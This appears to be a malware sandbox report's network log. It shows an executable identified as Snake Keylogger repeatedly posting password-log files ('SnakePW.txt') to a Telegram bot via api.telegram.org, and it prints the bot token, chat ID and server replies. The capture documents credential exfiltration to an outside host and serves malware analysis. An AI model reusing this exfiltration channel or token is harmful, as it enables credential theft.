                                                                    2022-06-26 07:34:09 UTC356OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 39 35 66 36 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570a95f6b0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:09 UTC357INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:09 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:09 UTC357INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66985,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228849,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    212192.168.2.550112149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:09 UTC358OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570accc8e1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:09 UTC358OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 61 63 63 63 38 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570accc8e1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:10 UTC358INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:10 UTC359INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66987,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228850,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    213192.168.2.550114149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:10 UTC359OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570b0865d5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:10 UTC360OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 30 38 36 35 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570b0865d5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:10 UTC360INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:10 UTC360INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66988,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228850,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    214192.168.2.550118149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:10 UTC361OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570b466176
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:10 UTC361OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 34 36 36 31 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570b466176Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:10 UTC362INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:10 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66989,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228850,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    215192.168.2.550119149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:10 UTC363OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570b7ad4f1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:10 UTC363OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 37 61 64 34 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570b7ad4f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:11 UTC363INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:11 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:11 UTC364INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66990,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228851,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    216192.168.2.550124149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:12 UTC364OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570bfdf55c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:12 UTC365OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 62 66 64 66 35 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570bfdf55cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:12 UTC365INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:12 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:12 UTC365INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66992,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228852,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    217192.168.2.550126149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:12 UTC366OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570c5fb674
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:12 UTC366OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 63 35 66 62 36 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570c5fb674Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:12 UTC367INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:12 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:12 UTC367INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66993,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228852,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    218192.168.2.550128149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:12 UTC368OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570c9db3f6
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
